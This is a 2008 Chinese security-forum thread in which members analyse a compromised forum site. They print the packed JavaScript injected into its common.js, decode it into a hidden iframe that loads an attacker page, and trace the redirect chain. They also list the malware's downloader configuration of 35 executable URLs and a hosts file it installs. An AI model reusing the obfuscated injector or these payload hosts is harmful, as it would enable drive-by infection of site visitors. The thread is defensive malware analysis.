收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) 挂马网(孢子网)
返回列表 发新帖
查看: 2590|回复: 7
收起左侧

[已鉴定] 挂马网(孢子网)

 关闭 [复制链接]
Hopesky
发表于 2008-11-23 10:10:56 | 显示全部楼层 |阅读模式
http://bbs.sporechina.com/thread-2544-1-1.html

被挂马,我的巡警叫了,帮分析一下,我要组杀软,没时间........
回复

举报

granthill
发表于 2008-11-23 10:15:30 | 显示全部楼层
Error: Too many connections
回复

举报

失翼天使
发表于 2008-11-23 10:40:52 | 显示全部楼层
Virus or unwanted program 'JS/Dldr.IFrame.EU [virus]'
回复

举报

lg560852
发表于 2008-11-23 10:41:35 | 显示全部楼层
在http://bbs.sporechina.com/include/javascript/common.js这个脚本中间部位,有这么一段代码:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.d(\'<7 4=0 c=1 a="6://9.2/8/b.5"></7>\')',62,14,'|100|cn|document|height|htm|http|iframe|files|teachername|src|face|width|writeln'.split('|'),0,{}))

解密后:
document.writeln('<iframe height=0 width=100 src="http://teachername.cn/files/face.htm"></iframe>')

freshow日志:
Log is generated by FreShow.
[wide]http://bbs.sporechina.com/thread-2544-1-1.html
    [script]http://bbs.sporechina.com/include/javascript/common.js
        [object]http://teachername.cn/files/face.htm
            [frame]http://baidu-baiduzi4.cn/b082222/b08.htm
                [frame]http://baidu-baiduzi4.cn/b082222/new.html
                    [frame]http://baidu-baiduzi4.cn/b082222/../14.htm
                        [object]http://qq.18i16.net/exe1/ms.css
                    [frame]http://baidu-baiduzi4.cn/b082222/fx.htm
                        [frame]http://baidu-baiduzi4.cn/b082222/mlink.html
                        [frame]http://baidu-baiduzi4.cn/b082222/xlink.html
                    [frame]http://baidu-baiduzi4.cn/b082222/../as.htm
                        [object]http://qq.18i16.net/exe1/ce.css
                    [frame]http://baidu-baiduzi4.cn/b082222/lzz.htm
                        [object]http://qq.18i16.net/exe1/b08.css
                    [frame]http://baidu-baiduzi4.cn/b082222/real11.htm
                        [object]http://qq.18i16.net/exe1/b08.css
                    [frame]http://baidu-baiduzi4.cn/b082222/../real10.htm
                        [object]http://qq.18i16.net/exe1/re.css
                    [frame]http://baidu-baiduzi4.cn/b082222/../Bfyy.htm
                        [object]http://qq.18i16.net/exe1/bf.css

评分

参与人数 1人气 +1 收起 理由
promised + 1 加分鼓励

查看全部评分

回复

举报

sanhu35
发表于 2008-11-23 10:58:10 | 显示全部楼层
<iframe height=0 width=100 src="http://teachername.cn/files/face.htm"></iframe>
-
-
<iframe width=100 height=0 src=http://baidu-baiduzi4.cn/b082222/b08.htm></iframe>
<script language="javascript" src="http://count50.51yes.com/click.aspx?id=507829494&logo=1"></script>
如LS。。。
回复

举报

lg560852
发表于 2008-11-23 11:04:37 | 显示全部楼层
ms.css下载列表http://qq.18i16.net/new.txt
[file]       
open=y
url1=http://59.34.197.63/list/bt01.exe
url2=http://59.34.197.63/list/bt02.exe
url3=http://59.34.197.63/list/bt03.exe
url4=http://59.34.197.63/list/bt04.exe
url5=http://59.34.197.63/list/bt05.exe
url6=http://59.34.197.63/list/bt06.exe
url7=
url8=http://59.34.197.63/list/bt08.exe
url9=http://59.34.197.63/list/bt09.exe
url10=http://59.34.197.63/list/bt10.exe
url11=http://59.34.197.63/list/bt11.exe
url12=http://59.34.197.63/list/bt12.exe
url13=http://59.34.197.63/list/bt13.exe
url14=http://59.34.197.63/list/bt14.exe
url15=http://59.34.197.102/list/bt15.exe
url16=http://59.34.197.102/list/bt16.exe
url17=http://59.34.197.102/list/bt17.exe
url18=http://59.34.197.102/list/bt18.exe
url19=http://59.34.197.102/list/bt19.exe
url20=http://59.34.197.102/list/bt20.exe
url21=http://59.34.197.102/list/bt21.exe
url22=http://59.34.197.102/list/bt22.exe
url23=http://59.34.197.102/list/bt23.exe
url24=http://59.34.197.102/list/bt24.exe
url25=http://59.34.197.102/list/bt25.exe
url26=http://59.34.197.102/list/bt26.exe
url27=http://59.34.197.102/list/bt27.exe
url28=http://59.34.197.102/list/bt28.exe
url29=http://59.34.197.102/list/bt29.exe
url30=http://59.34.197.102/list/bt30.exe
url31=http://59.34.197.102/list/bt31.exe
url32=http://59.34.197.63/list/bt32.exe
url33=http://59.34.197.63/list/bt33.exe
url34=http://59.34.197.63/list/bt34.exe
url35=http://59.34.197.63/list/bt35.exe
count=35

下载http://qq.18i16.net/ad.jpg替换本地Hosts文件
127.0.0.1       v.onondown.com.cn
127.0.0.2       ymsdasdw1.cn
127.0.0.3       h96b.info
127.0.0.0       www.bypk.com
127.0.0.1       va9sdhun23.cn
127.0.0.2       bnasnd83nd.cn
127.0.0.0       www.gamehacker.com.cn
127.0.0.0       gamehacker.com.cn
127.0.0.3       adlaji.cn
127.0.0.1       858656.com
127.1.1.1       bnasnd83nd.cn
127.1.1.1       555.hfdy2828.com
127.1.1.1       666.hfdy2828.com
127.0.1.1       59.34.216.143
127.0.0.1       my123.com
127.0.0.0       user1.12-27.net
127.0.0.1       8749.com
127.0.0.0       fengent.cn
127.0.0.1       4199.com
127.0.0.1       user1.16-22.net
127.0.0.1       www.oiuyt.net
127.0.0.1       61.164.118.209
127.0.0.1       7379.com
127.0.0.1       2be37c5f.3f6e2cc5f0b.com
127.0.0.1       7255.com
127.0.0.1       user1.23-12.net
127.0.0.1       59.34.216.225
127.0.0.1       avzhan.3322.org
127.0.0.1       avzhan.3322.org
127.0.0.1       down.ombb888.cn
127.0.0.1       down.ombb888.cn
127.0.0.1       www.mmd178.cn
127.0.0.1       61.160.210.41
127.0.0.1       61.160.210.42
127.0.0.1       61.160.210.43
127.0.0.1       61.160.210.44
127.0.0.1       61.160.210.45
127.0.0.1       61.160.210.46
127.0.0.1       3448.com
127.0.0.1       www.guccia.net
127.0.0.1       7939.com
127.0.0.1       a.o1o1o1.nEt
127.0.0.1       8009.com
127.0.0.1       user1.12-73.cn
127.0.0.1       piaoxue.com
127.0.0.1       3n8nlasd.cn
127.0.0.1       kzdh.com
127.0.0.0       www.sony888.cn
127.0.0.1       about.blank.la
127.0.0.0       user1.asp-33.cn
127.0.0.1       6781.com
127.0.0.0       www.netkwek.cn
127.0.0.1       7322.com
127.0.0.0       ymsdkad6.cn
127.0.0.1       localhost
127.0.0.0       www.lkwueir.cn
127.0.0.1       06.jacai.com
127.0.1.1       user1.23-17.net
127.0.0.1       1.jopenkk.com
127.0.0.0       upa.luzhiai.net
127.0.0.1       1.jopenqc.com
127.0.0.0       www.guccia.net
127.0.0.1       1.joppnqq.com
127.0.0.0       4m9mnlmi.cn
127.0.0.1       1.xqhgm.com
127.0.0.0       mm119mkssd.cn
127.0.0.1       100.332233.com
127.0.0.0       61.128.171.115:8080
127.0.0.1       121.11.90.79
127.0.0.0       www.1119111.com
127.0.0.1       121565.net
127.0.0.0       win.nihao69.cn
127.0.0.1       125.90.88.38
127.0.0.1       16888.6to23.com
127.0.0.1       2.joppnqq.com
127.0.0.0       puc.lianxiac.net
127.0.0.1       204.177.92.68
127.0.0.0       pud.lianxiac.net
127.0.0.1       210.74.145.236
127.0.0.0       210.76.0.133
127.0.0.1       219.129.239.220
127.0.0.0       61.166.32.2
127.0.0.1       219.153.40.221
127.0.0.0       218.92.186.27
127.0.0.1       219.153.46.27
127.0.0.0       www.fsfsfag.cn
127.0.0.1       219.153.52.123
127.0.0.0       ovo.ovovov.cn
127.0.0.1       221.195.42.71
127.0.0.0       dw.com.com
127.0.0.1       222.73.218.115
127.0.0.1       203.110.168.233:80
127.0.0.1       3.joppnqq.com
127.0.0.1       203.110.168.221:80
127.0.0.1       363xx.com
127.0.0.1       www1.ip10086.com.cm
127.0.0.1       4199.com
127.0.0.1       blog.ip10086.com.cn
127.0.0.1       43242.com
127.0.0.1       www.ccji68.cn
127.0.0.1       5.xqhgm.com
127.0.0.0       t.myblank.cn
127.0.0.1       520.mm5208.com
127.0.0.0       x.myblank.cn
127.0.0.1       59.34.131.54
127.0.0.1       210.51.45.5
127.0.0.1       59.34.198.228
127.0.0.1       www.ew1q.cn
127.0.0.1       59.34.198.88
127.0.0.1       59.34.198.97
127.0.0.1       60.190.114.101
127.0.0.1       60.190.218.34
127.0.0.0       qq-xing.com.cn
127.0.0.1       60.191.124.252
127.0.0.1       61.145.117.212
127.0.0.1       61.157.109.222
127.0.0.1       75.126.3.216
127.0.0.1       75.126.3.217
127.0.0.1       75.126.3.218
127.0.0.0       59.125.231.177:17777
127.0.0.1       75.126.3.220
127.0.0.1       75.126.3.221
127.0.0.1       75.126.3.222
127.0.0.1       772630.com
127.0.0.1       832823.cn
127.0.0.1       8749.com
127.0.0.1       888.jopenqc.com
127.0.0.1       89382.cn
127.0.0.1       8v8.biz
127.0.0.1       97725.com
127.0.0.1       9gg.biz
127.0.0.1       www.9000music.com
127.0.0.1       test.591jx.com
127.0.0.1       a.topxxxx.cn
127.0.0.1       picon.chinaren.com
127.0.0.1       www.5566.net
127.0.0.1       p.qqkx.com
127.0.0.1       news.netandtv.com
127.0.0.1       z.neter888.cn
127.0.0.1       b.myblank.cn
127.0.0.1       wvw.wokutu.com
127.0.0.1       unionch.qyule.com
127.0.0.1       www.qyule.com
127.0.0.1       it.itjc.cn
127.0.0.1       www.linkwww.com
127.0.0.1       vod.kaicn.com
127.0.0.1       www.tx8688.com
127.0.0.1       b.neter888.cn
127.0.0.1       promote.huanqiu.com
127.0.0.1       www.huanqiu.com
127.0.0.1       www.haokanla.com
127.0.0.1       play.unionsky.cn
127.0.0.1       www.52v.com
127.0.0.1       www.gghka.cn
127.0.0.1       icon.ajiang.net
127.0.0.1       new.ete.cn
127.0.0.1       www.stiae.cn
127.0.0.1       o.neter888.cn
127.0.0.1       comm.jinti.com
127.0.0.1       www.google-analytics.com
127.0.0.1       hz.mmstat.com
127.0.0.1       www.game175.cn
127.0.0.1       x.neter888.cn
127.0.0.1       z.neter888.cn
127.0.0.1       p.etimes888.com
127.0.0.1       hx.etimes888.com
127.0.0.1       abc.qqkx.com
127.0.0.1       dm.popdm.cn
127.0.0.1       www.yl9999.com
127.0.0.1       www.dajiadoushe.cn
127.0.0.1       v.onondown.com.cn
127.0.0.1       www.interoo.net
127.0.0.1       bally1.bally-bally.net
127.0.0.1       www.bao5605509.cn
127.0.0.1       www.rty456.cn
127.0.0.1       www.werqwer.cn
127.0.0.1       1.360-1.cn
127.0.0.1       user1.23-16.net
127.0.0.1       61.160.213.143
127.0.0.1       qq.xiaoxiao02.cn
127.0.0.1       baoge.9966.org
127.0.0.1       www.oiuyt.net
127.0.0.1       www.guccia.net
127.0.0.1       www.interoo.net
127.0.0.1       upa.netsool.net
127.0.0.1       qq.gong2008.com
127.0.0.1       2008tl.copyip.com
127.0.0.1       tla.laozihuolaile.cn
127.0.0.1       www.tx6868.cn
127.0.0.1       p001.tiloaiai.com
127.0.0.1       s1.tl8tl.com
127.0.0.1       s1.gong2008.com
127.0.0.1       js.users.51.la
127.0.0.1       vip2.51.la
127.0.0.1       web.51.la
127.0.0.1       4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1       2be37c5f.3f6e2cc5f0b.com
回复

举报

lg560852
发表于 2008-11-23 11:10:53 | 显示全部楼层
发现这个病毒作者网络知识没学好
127.0.0.1       61.160.210.41
127.0.0.1       61.160.210.42
127.0.0.1       61.160.210.43
127.0.0.1       61.160.210.44
127.0.0.1       61.160.210.45
127.0.0.1       61.160.210.46

回复

举报

左手
发表于 2008-11-23 11:49:09 | 显示全部楼层
无法显示网页
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-15 14:34 , Processed in 0.145120 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表